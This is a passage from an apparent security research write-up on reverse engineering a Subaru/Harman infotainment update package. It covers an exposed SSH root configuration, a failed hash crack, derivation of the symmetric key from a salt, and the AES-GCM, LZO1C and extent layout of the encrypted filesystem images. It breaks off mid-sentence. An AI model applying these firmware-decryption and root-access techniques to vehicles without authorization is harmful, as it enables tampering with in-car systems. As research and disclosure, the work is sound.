umount enableBootingFromEMMCBootArea.sh libfile.so.1 rm umountMMC0.sh fram.conf libslog2parse.so.1 scaling.conf uname fs-dos.so libslog2shim.so.1 scaling_new.conf updateIPLInEMMCBootArea.sh fs-qnx6.so libslog2.so.1 services waitfor This clearly isn't even close to all of the files the system will use to boot and launch the interface, but it's a start. Files of Note authorized_keys - key for sshd. Probably how Harman engineers can login over SSH for troubleshooting and field support. banner - sshd banner we see when we connect over WiFi. This indicates that we're looking at the right files. sshd_config - AllowUsers root, PasswordAuthentication yes, PermitRootLogin yes, Wow! passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: ubtsvc:x:3:9:bt service:/: logger:x:101:71:Subaru Logger:/home/logger:/bin/sh certifier:x:102:71:Subaru Certifier:/home/certifier:/bin/sh shadow - Password hashes for root and other accounts. QNX6 hashtype is supported by JTR (not hashcat as far as I am aware), but doesn't appear to be GPU accelerated. I spent several days attempting a crack on a 32-core system using free CPU credits I had from one of the major providers, but without GPU acceleration, got nowhere. As long as they made the password decently complicated, there isn't much we can do. startnetwork.sh - Starts "asix adapter driver" then loads a DHCP client. AKA we can buy a cheap USB to Ethernet adapter, plug it into the head unit's USB ports, and get access to the vehicles internal network. This allows us access to sshd on base units that do not have the wireless chipset. This is almost certainly how Harman field engineers troubleshoot vehicles. We can verify this works by buying an ASIX adapter, plugging it in, powering up the head unit, watching traffic on Wireshark, and seeing the DHCP probes. symm.key - Clearly a symmetric key. Obvious guess is the key that decrypts the .dat files. Perfect. minifs.ifs Contents There are other IFS files included in the ISO. miniifs seems to contain most of the files used during the software update process. Almost every command line binary on the system has handy help descriptions we can get via strings: %C softwareUpdate Usage => -------- To Start Service installUpdate -c language files -l language id -i ioc channel name ( e.g. /dev/ioc/ch4) -b If running on Subaru Base Variant -p pps path to platform features, e.g /pps/platform/features -r config file path for RH850 Binary mapping e.g)# installUpdate & or # e.g) # installUpdate -l french_fr &NAME=installUpdate DESCRIPTION=installUpdate There are too many files to note here, but a few stand out: andromeda - An enormous 17MB-20MB binary blob that seems to run the UI and implement most of the head unit functionality. Looks to make heavy use of QT. installUpdate - Installs update files. installUpdate.sh - Shell script that triggers the update. Unknown who or what calls this script. So, installUpdate.sh executes this at the end: echo " -< Start of InstallUpdate Service >- " installUpdate -c /fs/swMini/miniFS/usr/updatestrings.json -b postUpdate.sh What's in updatestrings.json? "SWDL_USB_AUTHENTICATED_FIRST_SCREEN": "This update may take up to 60 minutes to<br>complete. Please keep your vehicle running<br>(not Accessory mode) throughout the entire<br>installation.", "SWDL_USB_AUTHENTICATED_SECOND_SCREEN": "If you update while your vehicle is idling,<br>please make sure that your vehicle<br>is not in an enclosed spa ce such as a<br>garage.", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN": "The infotainment system will be temporarily<br>unavailable during the update.<br>Current Version: %s<br>Availab le Version: %s<br>Would you like to install now?", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN_SAME_IMAGE": "The infotainment system will be temporarily<br>unavailable", The file contains the same strings shown to the user through the GUI during the software update process. Hence, installUpdate is almost certainly the file we want to reverse engineer to understand the update process. Remember the encrypted dat files with the QNXCNDFS header? Let's see if any binaries reference that string. $ ag -a QNXCNDFS Binary file cdqnx6fs matches. Binary file cndfs matches. $ strings cndfs %C - condense / restore Power-Safe (QNX6) file-systems %C -c [(general-option | condense-option)...] src dst %C -r [(general-option | restore-option)...] src dst General options: -C dll specify cache-control DLL to use with direct I/O -f force use of direct I/O, even if disk cache cannot be discarded -I use direct I/O for reading data -k key specify the key to use for data encryption / decryption. <key> must be a string of hexadecimal digits, optionally separated by punctuation characters. -K dll[,args] specify a DLL to provide the key to use for data encryption or decryption. Optionally, an arguments string can be added which will be passed to the key provider function. See below. -O use direct I/O for writing data -p name store progress information in shared-memory object <name> -s size specify the chunk size [bytes] (default: 1M) -S enable synchronous direct I/O. This should cause io-blk to discard cached blocks on direct I/O, which may reduce performance. Default is to try and discard the cache for the entire device before any I/O is performed (see -f option). -v increase verbosity -? print this help Condense-options: -b size specify the raw block size for compression [bytes] (default: 64k) -c condense file-system <src> into file <dst> -d num specify the data hashing method. <num> must be in the range 0..7 (default: 4). See below for supported methods. -D deflate data -h num specify the header hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. -m num specify the metadata hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. Restore-options: -r restore file-system <dst> from condensed file <src> -V verify written data during restoration Where: src is the source file / block device dst is the destination file / block device Hash methods: 0 = none 1 = CRC32 2 = MD5 3 = SHA224 4 = SHA256 5 = SHA384 6 = SHA512 7 = AES256-GCM (encrypts; requires 256-bit key) It appears that cndfs/cdqnx6fs can both encrypt/decrypt our dat files, and CNDFS stands for "condensed" filesystem. The help message also lets us know that it is almost certainly encrypted with AES256-GCM, uses a 256-bit key, and may be compressed. Unfortunately, we'd need code execution to run this. ISO Modification The most logical first attack is to modify the ISO. We can verify this method is impossible by changing a single byte in the image and trying to install it. On USB insertion, the device probes for certain files on the USB stick. If it finds files that indicate an update, it will claim that it is verifying the integrity of the files (although it actually doesn't do this until reboot, strange!), print a "success" message, reboot into some form of software-update mode, then actually checks the integrity of the ISO. Only the ISO header appears to be signed, but the header contains a SHA hash of the rest of the ISO. Installation will only continue if the header and SHA hashes validate. Barring a mistake in the signature verification subroutines, we will be unable to modify the ISO for trivial code execution. At this point we've extracted a large number of relevant files from the update package. The files appear to be specific to the early boot process of the device and a specific update mode. We don't yet know what is contained in the encrypted dat files. Reverse Engineering QNXCNDFS As code execution via ISO modification is unfortunately (fortunately?) not trivial, the next step is to decrypt the condensed dat file. Ideally the encrypted files contain some form of security sensitive functionality — i.e. perhaps debug functionality we can abuse on USB insertion. Plenty of embedded systems trigger functionality and debug settings when specific files are loaded onto USB drives and inserted, so we can hope for that here. At worst, we will most likely gain access to more system files we can investigate for rooting opportunities. QNXCNDFS is a custom image format with no known information available on the Internet, so we'll start from scratch with the installUpdate binary. We know that cndfs or cdqnx6fs are probably involved as they contain the QNXCNDFS string, but how do they get called? installUpdate Flow First, find any references to the cdqnx6fs or cndfs files in installUpdate. It probably gets called here: LOAD:0805849C ; r0 is key? LOAD:0805849C LOAD:0805849C dat_spawn_copy_directory ; CODE XREF: check_hash_copy+CA↓p LOAD:0805849C LOAD:0805849C var_28 = -0x28 LOAD:0805849C var_24 = -0x24 LOAD:0805849C var_20 = -0x20 LOAD:0805849C var_1C = -0x1C LOAD:0805849C var_18 = -0x18 LOAD:0805849C var_14 = -0x14 LOAD:0805849C LOAD:0805849C 70 B5 PUSH {R4-R6,LR} LOAD:0805849E 0C 46 MOV R4, R1 LOAD:080584A0 86 B0 SUB SP, SP, #0x18 LOAD:080584A2 0E 49 LDR R1, =aCopyDirectoryC ; "Copy Directory Command " LOAD:080584A4 06 46 MOV R6, R0 LOAD:080584A6 0E 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080584A8 15 46 MOV R5, R2 LOAD:080584AA FC F7 9D FA BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080584AE FC F7 6B FA BL sub_8054988 LOAD:080584B2 0C 4B LDR R3, =aR ; "-r" LOAD:080584B4 04 36 ADDS R6, #4 LOAD:080584B6 03 94 STR R4, [SP,#0x28+var_1C] LOAD:080584B8 02 96 STR R6, [SP,#0x28+var_20] LOAD:080584BA 01 20 MOVS R0, #1 LOAD:080584BC 00 93 STR R3, [SP,#0x28+var_28] LOAD:080584BE 0A 4B LDR R3, =aK ; "-k" LOAD:080584C0 04 95 STR R5, [SP,#0x28+var_18] LOAD:080584C2 0A 4A LDR R2, =(aFsSwminiMinifs_10+0x16) ; "cdqnx6fs" LOAD:080584C4 01 93 STR R3, [SP,#0x28+var_24] LOAD:080584C6 00 23 MOVS R3, #0 LOAD:080584C8 05 93 STR R3, [SP,#0x28+var_14] LOAD:080584CA 09 4B LDR R3, =off_808EA34 LOAD:080584CC D3 F8 94 10 LDR.W R1, [R3,#(off_808EAC8 - 0x808EA34)] ; "/fs/swMini/miniFS/bin/cdqnx6fs" LOAD:080584D0 08 4B LDR R3, =(aSCSIV+0xC) ; "-v" LOAD:080584D2 F9 F7 E0 E9 BLX spawnl LOAD:080584D6 06 B0 ADD SP, SP, #0x18 LOAD:080584D8 70 BD POP {R4-R6,PC} LOAD:080584D8 ; End of function dat_spawn_copy_directory spawnl creates a child process, so this seems like the correct location. If we look at the caller of dat_spawn_copy_directory, we find ourselves near code verifying some form of integrity of a dat file. LOAD:080586BC loc_80586BC ; CODE XREF: check_hash_copy+2E↑j LOAD:080586BC ; check_hash_copy+8E↑j LOAD:080586BC 20 6D LDR R0, [R4,#0x50] LOAD:080586BE 29 46 MOV R1, R5 LOAD:080586C0 3A 46 MOV R2, R7 LOAD:080586C2 04 F0 80 F8 BL check_dat_hash LOAD:080586C6 01 28 CMP R0, #1 LOAD:080586C8 81 46 MOV R9, R0 LOAD:080586CA 06 D1 BNE loc_80586DA LOAD:080586CC LOAD:080586CC invalid_dat_file ; CODE XREF: check_hash_copy+40↑j LOAD:080586CC 2E 49 LDR R1, =aIntrusionDetec ; "Intrusion detected: Invalid dat file!!!" LOAD:080586CE 2B 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080586D0 FC F7 8A F9 BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080586D4 FC F7 58 F9 BL sub_8054988 LOAD:080586D8 41 E0 B loc_805875E check_dat_hash doesn't actually verify the dat files — instead, it verifies the ISO contents hash to a value that is in the ISO header. This is relatively easy to discover as the function does a fseek to 0x8000 right at the start. LOAD:0805C850 4F F4 00 41 MOV.W R1, #0x8000 ; off LOAD:0805C854 2A 46 MOV R2, R5 ; whence LOAD:0805C856 F4 F7 66 EE BLX fseek LOAD:0805C85A 78 B1 CBZ R0, loc_805C87C LOAD:0805C85C 04 21 MOVS R1, #4 LOAD:0805C85E 05 22 MOVS R2, #5 LOAD:0805C860 32 4B LDR R3, =aFseekFailedToO ; "Fseek failed to offset 32768" What is 0x8000? The ISO 9660 filesystem specifies that the first 0x8000 bytes are "unused". Harman appears to use this section for signatures and other header information. Thus, installUpdate is seeking past this header, then hashing the rest of the ISO contents to verify integrity. The header is signed and contains the comparison hash, so we cannot just modify the ISO header hash to modify the ISO as we'd also need to re-sign the file. That would require Harman's private key, which we obviously don't have. Before installUpdate calls into the QNXCNDFS functionality, the system needs to successfully verify the ISO signature. Easy enough, we already have a valid update that is signed. cdqnx6fs Start by looking at the cdqnx6fs strings. This handy string pops out: Source: '%s' %s Destination: '%s' %s Chunk size: %u bytes Raw chunk size: %u bytes Max raw blk length: %u bytes Max cmp blk length: %u bytes Extents per chunk: %u Condensed file information: Signature: 0x%08llx Version: 0x%08x Flags: 0x%08x Compressed: %s File size: %llu bytes Number of extents: %llu Header hash method: %s Payload data: %llu bytes Header hash: %s Metadata hash method: %s Metadata hash: %s Data hash method: %s Data hash: %s File system information: File system size: %llu bytes Block size: %u bytes Number of blocks: %u Bitmap size: %u bytes Nr. of used blocks: %u On execution, the application prints out a large amount of header data. If we go to the function printing this string, the mapping between the header and the string prints becomes clear. LOAD:0804AA8C 4D F2 1C 10+ MOV R0, #aCondensedFileI ; "Condensed file information:" LOAD:0804AA94 FF F7 96 E9 BLX puts LOAD:0804AA98 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AA9A D3 E9 00 23 LDRD.W R2, R3, [R3] LOAD:0804AA9E 4D F2 38 10+ MOV R0, #aSignature0x08l ; " Signature: 0x%08llx\n" LOAD:0804AAA6 FF F7 3A E9 BLX printf LOAD:0804AAAA BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAAC 1B 89 LDRH R3, [R3,#8] LOAD:0804AAAE 4D F2 5C 10+ MOV R0, #aVersion0x04hx ; " Version: 0x%04hx\n" LOAD:0804AAB6 19 46 MOV R1, R3 LOAD:0804AAB8 FF F7 30 E9 BLX printf LOAD:0804AABC BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AABE 5B 89 LDRH R3, [R3,#0xA] LOAD:0804AAC0 4D F2 80 10+ MOV R0, #aFsType0x04hx ; " FS type: 0x%04hx\n" LOAD:0804AAC8 19 46 MOV R1, R3 LOAD:0804AACA FF F7 28 E9 BLX printf LOAD:0804AACE BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAD0 DB 68 LDR R3, [R3,#0xC] LOAD:0804AAD2 4D F2 A4 10+ MOV R0, #aFlags0x08x ; " Flags: 0x%08x\n" R3 points to the DAT file contents. Before each print, a constant is added to the DAT file content pointer then the value is dereferenced. In effect, each load shows us the correct offset to the field being printed. Thus, signature is offset 0 (the QNXCNDFS string, not a digital signature one might first suspect), version is offset 8, filesystem type is offset 0xA, etc. Using this subroutine, we can recover around 70-80% of the header data for the encrypted file with virtually no effort. Since we don't know what FS type actually means or corresponds to, these aren't the best fields to verify. If we go down a bit in the function, we get to more interesting header fields with sizes. LOAD:0804AB38 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB3A D3 E9 04 23 LDRD.W R2, R3, [R3,#0x10] LOAD:0804AB3E 4D F2 10 20+ MOV R0, #aRawSizeLluByte ; " Raw size: %llu bytes\n" LOAD:0804AB46 FF F7 EA E8 BLX printf LOAD:0804AB4A BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB4C D3 E9 06 23 LDRD.W R2, R3, [R3,#0x18] LOAD:0804AB50 4D F2 38 20+ MOV R0, #aCondensedSizeL ; " Condensed size: %llu bytes\n" LOAD:0804AB58 FF F7 E0 E8 BLX printf LOAD:0804AB5C BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB5E D3 E9 08 23 LDRD.W R2, R3, [R3,#0x20] LOAD:0804AB62 4D F2 60 20+ MOV R0, #aRawDataBytesLl ; " Raw data bytes: %llu bytes\n" LOAD:0804AB6A FF F7 D8 E8 BLX printf Condensed size is a double-word (64-bit value) loaded at offset 0x18. This corresponds to this word in our header: 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 8c 1d 5e 05 00 00 00 00 is little endian for 90054028 bytes, which is the exact size of swupdate.dat. This is confirmation that we're on the right track with the header. The header contains several configurable hashes. There's a hash for the metadata, a hash for an "extents" and "cluster" table, and finally a hash for the actual encrypted data. The hash bounds can be reverse engineered by simply guessing else looking a bit further in the binary. The cdqnx6fs binary is quite compact and doesn't contain many debugging strings. Reverse engineering it will be time consuming, so attempting to guess at the file-format instead of reverse engineering large amounts of filesystem IO code could save time. Cluster Table The cluster table contains a header-configurable number of clusters. I didn't know what clusters were at this point, but an initial guess is something akin to a filesystem block. The header also contains an offset to a table of clusters. The table of clusters looks like this: 00000280 90 0e 00 00 00 00 00 00 e1 e6 00 00 00 00 00 00 |................| 00000290 71 f5 00 00 00 00 00 00 19 1c 00 00 00 00 00 00 |q...............| 000002a0 8a 11 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |................| 000002b0 a3 2d 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |.-..............| Again, we can easily guess what this is with a little intuition. If we assume the first doubleword is a pointer in the existing file and navigate to offset 0x0E90, we get: 00000e50 80 f3 42 05 00 00 00 00 5f 89 07 00 00 00 00 00 |..B....._.......| 00000e60 df 7c 4a 05 00 00 00 00 96 fd 08 00 00 00 00 00 |.|J.............| 00000e70 75 7a 53 05 00 00 00 00 2c 21 06 00 00 00 00 00 |uzS.....,!......| 00000e80 a1 9b 59 05 00 00 00 00 eb 81 04 00 00 00 00 00 |..Y.............| 00000e90 0e 0f 86 ac 0a e5 9c 25 ce 6d 09 ee 9c 58 39 9a |.......%.m...X9.| 00000ea0 97 84 6f 26 5c 8b 03 c2 bf b6 c8 80 11 69 34 10 |..o&\........i4.| 00000eb0 c1 0c 02 5c 01 fa f8 fa 10 65 c2 d3 3b 49 82 14 |...\.....e..;I..| 00000ec0 d6 3c ef ce db 52 5b 11 42 69 6e c3 50 a2 1f af |.<...R[.Bin.P...| 0xe90 is the end of the cluster table (note the change in entropy). The first doubleword is almost certainly an offset into the data section. For the next doubleword, a guess is that it is the size of the cluster data. 0x0e90 + 0xE6E1 = 0xF571. The next cluster entry offset is indeed 0xF571. We now understand the cluster table and the data section. Cluster Data Chunks of cluster data can now be extracted from the data segment using the cluster table. Each chunk looks entirely random and there is no clear metadata in any particular chunk. Using header data, we know that both dat files shipped in this update are both encrypted and compressed. The decryption step will need to happen first using AES256-GCM. Via reverse engineering and searching for strings near the encryption code, it is clear that the cdqnx6fs binary is using mbed tls. The target decryption function is mbedtls_gcm_auth_decrypt . After researching GCM a bit more, we will need the symmetric key, the initialization vector, and an authentication tag to correctly decrypt and verify the buffer. We have a probable symmetric key from the filesystem, but need to find the IV and tag. Again, the code is dense and reverse-engineering the true structure would take quite a bit of time, and I didn't find evidence of a constant IV, so let's guess. If I were designing this, I'd put the IV in the first 16 bytes, the tag in the next 16, then have the encrypted data following that. There aren't too many logical combinations here, so we can switch the IV and tag around, and also try prepending and appending this data. This seemed likely to me. Unfortunately, after plugging in the symmetric key and trying the above process in python, nothing seemed to decrypt correctly. The authentication tags never matched. Thus, we potentially guessed incorrectly on the structure of the encrypted clusters, the algorithm isn't actually AES-GCM (or it was modified), or something else is going on. Before delving into the code, let's search for where the encryption key is passed from installUpdate to cdqnx6fs. The symm.key file seems like an obvious choice for the symmetric key, but maybe that isn't correct. Decrypting How do we locate where the symmetric key is loaded and passed to the new process? Search for the filename and examine all references. There is only one reference, and it is passed to fopen64. A short while after, this value is passed to the cdqnx6fs process. Examine the following code: LOAD:08052ADE 37 48 LDR R0, =aDecrypting ; "Decrypting..." LOAD:08052AE0 FE F7 74 EE BLX puts LOAD:08052AE4 36 4B LDR R3, loc_8052BC0 LOAD:08052AE6 37 49 LDR R1, =(aR+1) ; "r" LOAD:08052AE8 18 68 LDR R0, [R3] ; "/etc/keys/symm.key" LOAD:08052AEA FE F7 68 EA BLX fopen64 LOAD:08052AEE 05 46 MOV R5, R0 LOAD:08052AF0 48 B9 CBNZ R0, loc_8052B06 LOAD:08052AF2 35 4B LDR R3, =(a89abcdefcalcne+8) ; "calcNewSymmKey" LOAD:08052AF4 02 21 MOVS R1, #2 LOAD:08052AF6 0A 46 MOV R2, R1 LOAD:08052AF8 00 93 STR R3, [SP,#0xC0+var_C0] LOAD:08052AFA 32 23 MOVS R3, #0x32 LOAD:08052AFC 01 93 STR R3, [SP,#0xC0+var_BC] LOAD:08052AFE 33 4B LDR R3, =aUnableToOpenSy ; " Unable to open symm key file : %s , %d"... LOAD:08052B00 FE F7 FE EC BLX slog2f LOAD:08052B04 1E E0 B return_err A major hint is the debug error message that happens to print the function name. The function the symmetric key gets loaded in is called calcNewSymmKey, and another debug message prints "Decrypting...". The symmetric key is modified via some form of transformation. Key Generation Back before every app was built with Electron and used around three gigs of RAM to send a tweet, software authors would distribute demos and shareware, which was software that usually had the complete functionality unlocked for a brief time-trial. To unlock it, you would pay the author and get back a code (serial) you could enter into the program. This serial was often tied to hardware specific information or a user-name. If the serial was valid, the program would unlock. There are numerous different ways to get around this. In order of what the "scene" considered most technically impressive and useful back in the day, the best way to bypass software serial schemes was as follows: Key Generator - Reverse engineer the author's serial registration algorithm. Port it to C or well documented, ASM, write a nifty win32 applet that plays mod files and makes your logo spin around, etc. Self-key generation - Modify the binary to print out the real serial number in a text box. Many programs would make the fatal mistake of comparing the true serial with the one the user entered via strcmp. Just change the comparison to a message box display function and exit right after as you probably overwrote some important code. After you get the code, delete the patched version, install the original, and you have an "authentically" registered program. Patching - Bypass the time-limit, always return "Registered", etc. The more patches it took, usually the worse the "crack" was. Reverse engineering the key generation algorithm was always the hardest method. Patching was challenging as it was a cat and mouse game between developers and crackers. Registration functionality would get increasingly complicated to try and obfuscate what was going on. Harman has designed an encryption scheme that is quite similar to early software protection efforts. Emulation Harman's algorithm looks rather simple as the function generating the new key doesn't call into any subroutines, doesn't use any system calls, and is only 120 lines of ARM. The ARM is interesting to look at, but at the end of the day one can statically analyze the entire process without ever leaving the subroutine. But understanding the assembly and converting it to C will take time. What if we could just emulate the algorithm? We're running ARM. The easiest way will be to take the actual assembly and paste it directly into an assembly stub, then call into that from C. After it returns, print the modified memory contents. Cross-compile it, run in QEMU, and done. The idea is to take the Harman transformation code and run it exactly. This isn't quite as easy as copy-and-paste, but it is close. I had to modify a few registers to get this to work. The assembly stub: .syntax unified .section .text .global decrypt .cpu cortex-a9 .thumb decrypt: push {r4-r7, lr} # Code goes here! pop {r4-r7, pc} The C shim: #include <stdio.h> extern char *decrypt(char *, int); #define SALT 0x0 int main() { char symmetric_key[] = "key-was-here"; char *output = decrypt(symmetric_key, SALT); printf("Key is: %s\n", output); return 0; } The Makefile: all: arm-linux-gnueabi-gcc -Wall -pedantic key.c -g algo.s -static -mthumb && qemu-arm -cpu cortex-a9 a.out clean: rm a.out The only other trick to note is that the calcNewSymmKey function takes in one parameter called a salt. Salt is loaded from the very end of the standard ISO header (0x7FDE) and is also printed in some of the build artifacts that are still packaged with the updates. 00007fd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 |..............09| 00007fe0 a9 2b 74 10 51 6b 01 46 5b 1a e3 40 dc d1 ec d5 |.+t.Qk.F[..@....| 00007ff0 36 a4 53 0c 23 05 bd 76 ac 60 83 f0 7b 88 79 c5 |6.S.#..v.`..{.y.| 00008000 01 43 44 30 30 31 01 00 57 69 6e 33 32 2f 4d 69 |.CD001..Win32/Mi| The salt fetching code simply converts a two-digit ASCII character array into an integer. salt = 10 * DIGIT1 + DIGIT2 - 0x210; Which is just an expanded version of the "convert a two-digit character array representing an integer number to an integer" algorithm: salt = 10(DIGIT1 - 0x30) + (DIGIT2 - 0x30) After running the key generator with the correct salt, we get a significantly modified symmetric key that decrypts the clusters. Easy as that! I believe the true key generation algorithm can be derived by playing around with the symmetric key and the salt value with the key generator. It appears to be a simple rotation cipher. I will not release the full key generator as it is using Harman's own code. On the plus side, this should cut down on "I flashed a random binary to my head unit and it won't turn on" support e-mails. Cluster Decryption With the new key, the aforementioned guessed decryption scheme works. IV is indeed the first chunk, followed by the authentication tag, followed by the encrypted data. 00000000 04 eb 10 90 00 60 00 01 10 43 00 18 d8 6f 17 00 |.....`...C...o..| 00000010 00 80 fa 31 c0 8e d0 bc 00 20 b8 c0 07 50 b8 36 |...1..... ...P.6| 00000020 01 50 cb 00 2b 81 00 66 90 e9 00 02 8d b4 b7 01 |.P..+..f........| 00000030 39 81 00 ff ff 04 00 93 27 08 00 3d 01 00 04 18 |9.......'..=....| 00000040 00 90 7c 26 b8 00 9b cf d7 01 19 cf 00 0d 0a 51 |..|&...........Q| 00000050 4e 58 20 76 31 2e 32 62 20 42 6f 6f 74 20 4c 6f |NX v1.2b Boot Lo| 00000060 61 64 65 72 57 00 10 55 6e 73 75 70 70 6f 72 74 |aderW..Unsupport| 00000070 65 64 20 42 49 4f 53 52 00 08 52 41 4d 20 45 72 |ed BIOSR..RAM Er| 00000080 72 6f 7e 00 09 44 69 73 6b 20 52 65 61 64 26 12 |ro~..Disk Read&.| 00000090 00 10 4d 69 73 73 69 6e 67 20 4f 53 20 49 6d 61 |..Missing OS Ima| 000000a0 67 65 52 00 07 49 6e 76 61 6c 69 64 29 13 00 29 |geR..Invalid)..)| 000000b0 17 01 06 4d 75 6c 74 69 2d 76 03 03 00 3a 20 5b |...Multi-v...: [| 0x9010eb04 is the tag for a QNX6 filesystem. Some of the strings look slightly corrupted, which is probably explained by the compression. Cluster Decompression If we go back to the binary and look for a hint, we find a great one: LOAD:0805D6D8 41 73 73 65+aAssertionFaile DCB "Assertion failed in %s@%d:e == LZO_E_OK",0 This points us, with almost absolute certainty, to lzo. Take the chunk, pass it to lzo1x_decompress_safe() via C or Python, then get the following error message: lzo.error: Compressed data violation -6 So, this isn't miniLZO? This part stumped me for a few hours as lzo1x is by far the most commonly used compression function used from the LZO library. The LZO library does provide many other options that are benchmarked in the LZO documentation — i.e., there's also LZO1, LZO1A, LZO1B, LZO1C, LZO1F, LZO1Y, etc. lzo1x is packaged inside of miniLZO, and is recommended as the best, hence seems to be almost the only algorithm ever used as far as I am aware. From the LZO documentation: My experiments have shown that LZO1B is good with a large blocksize or with very redundant data, LZO1F is good with a small blocksize or with binary data and that LZO1X is often the best choice of all. LZO1Y and LZO1Z are almost identical to LZO1X - they can achieve a better compression ratio on some files. Beware, your mileage may vary. I tested most of the algorithms, and only one worked: lzo1c_decompress_safe. So, why was lzo1c used? I have absolutely no idea. My guess is someone was bored one day and benchmarked several of the lzo algorithms for QNXCNDFS, or someone thought this would make it difficult to recover the actual data. This just makes decryption an annoyance as every upstream lzo package usually only implements the lzo1x algorithm. Mounting the Image After all of this, we can now decrypt and decompress all of the chunks. Concatenating the result of this gives us a binary blob that looks quite like a QNX6 filesystem. The Linux kernel can be built to mount QNX6 filesystem as read-only thanks to the work of Kai Bankett. However, if we try to mount the concatenated image, we get a superblock error. $ sudo mount -t qnx6 -o loop system.dat.dec.noextent mnt mount: /home/work/workspace/mnt: wrong fs type, bad option, bad superblock on /dev/loop7, missing codepage or helper program, or other error. The kernel module reports: [ 567.260015] qnx6: unable to read the second superblock On top of all of this, some of the header fields do not appear to match up with what we expect: raw size (dword header offset: 0x10) does not match the file size of our decrypted and decompressed blob. This almost certainly has to do with the previously ignored extents section of the QNXCNDFS file. The Extents Section Most of the QNXCNDFS file is now understood, with one exception: the extents section. 00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| Low entropy again, so we can try guessing. We know the size and start of the extents section from the header. We know there are four "extents" (again from the header), hence the above is almost certainly four sets of four dwords. Searching the binary for useful strings isn't too productive. Two fields are named, but no other hints: LOAD:0805DD8C 41 73 73 65+aAssertionFaile_1 DCB "Assertion failed in %s@%d:cpos == xtnt->clstr0_pos",0 ... LOAD:0805DE2C 41 73 73 65+aAssertionFaile_2 DCB "Assertion failed in %s@%d:offset == xtnt->clstr0_off",0 So, one field may be a cluster position, the other may be some form of cluster offset. There seem to be some patterns in the data. If we assume the first dword is an address and the second dword is a length, the results look good. Extent at 0x200: Write Address: 0x00000000, Write Size: 0x00002000 Extent at 0x220: Write Address: 0x00002000, Write Size: 0x00000200 Extent at 0x240: Write Address: 0x00003000, Write Size: 0x0C078000 Extent at 0x260: Write Address: 0x3FFFB000, Write Size: 0x00000200 Adding up the write sizes gives us 0xC07A400, which matches the header field for "raw data bytes" of the file. These don't line up perfectly. The first and second extent makes sense — write address 0 + write size 0 = write address 1. What do the third and fourth dword represent? Clusters are likely involved, in fact, the third dword does point to offsets that line up with cluster table entries. Dword four is a bit mysterious. To solve this, understanding the QNX6 superblock structure is helpful. Understanding the Extents There's a well written write-up of the QNX6 filesystem structure done by the same individual that implemented the driver in the Linux kernel. Summarizing the useful parts, there are two superblocks in the filesystem images. One is near the beginning and one is near the end. Debugging the kernel module indicates that the first superblock is correct and validating, while the second is missing or invalid. Manually calculating the second superblock address via following the source code gets us this: //Blocksize is 1024 (0x400) //num_blocks = 0xFFFE0 //bootblock offset = #define QNX6_BOOTBLOCK_SIZE 0x2000 #define QNX6_SUPERBLOCK_AREA 0x1000 /* calculate second superblock blocknumber */ offset = fs32_to_cpu(sbi, sb1->sb_num_blocks) + (bootblock_offset >> s->s_blocksize_bits) + (QNX6_SUPERBLOCK_AREA >> s->s_blocksize_bits); So: 0xFFFE0 + (0x2000 >> 10) + (0x1000 >> 10) * 1024 block size is offset: (0xFFFE0 + 8 + 4) * 1024 = 0x3FFFB000 Note that the calculated second superblock address is the same as the last extent write address. At this point, it became clear to me that the extents section is just used to "compress" large runs of zeros. The last extent is skipping a large chunk of memory and then writing out the superblock from the end of the last cluster. Thus, we can process the extents like this: aa aa aa aa 00 00 00 00 bb bb bb bb 00 00 00 00 cc cc cc cc 00 00 00 00 dd dd dd dd 00 00 00 00 At offset 0xaaaaaaaa, write 0xbbbbbbbb bytes from offset 0xdddddddd into the cluster pointed to by cluster table entry 0xcccccccc. Or, a real example: 00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| mmap a 0 set file of header field "raw size" bytes. At offset 0x00000000, write 0x00002000 bytes from an offset of 0x00000000 into the cluster pointed to by table entry 0x0280. At offset 0x00002000, write 0x00000200 bytes from an 